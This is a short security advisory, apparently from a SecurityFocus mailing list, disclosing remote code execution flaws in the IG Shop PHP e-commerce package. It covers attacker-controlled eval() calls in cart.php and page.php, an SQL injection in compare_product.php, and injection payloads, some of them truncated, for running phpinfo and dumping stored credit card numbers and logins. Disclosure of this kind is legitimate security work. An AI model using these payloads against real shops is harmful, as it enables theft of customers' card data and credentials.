IG Shop remote code execution Jan 05 2007 05:51AM
asdfj38 yahoo com
"If eval is the answer, then you are asking the wrong question."

ig-shop suffers from two eval's that can be controlled by an attacker:;phpinfo();//
./cart.php line 692:
eval ("cart_$action();");;phpinfo();//
./page.php line 336:
eval ("page_$action();");

Dumps all credit card numbers:;$q=mysql_query(stripslashes($l
Some of these variables can be decoded using the unserlize() funciton.

Dumps all logins:;$q=mysql_query(stripslashes($l

sql injection works regardless of magic_quotes_gpc.
./compare_product.php line 11:
$qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id];
Should have used quote marks.

vendor's page:http://www.igeneric.co.uk/

By Michael Brooks.

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus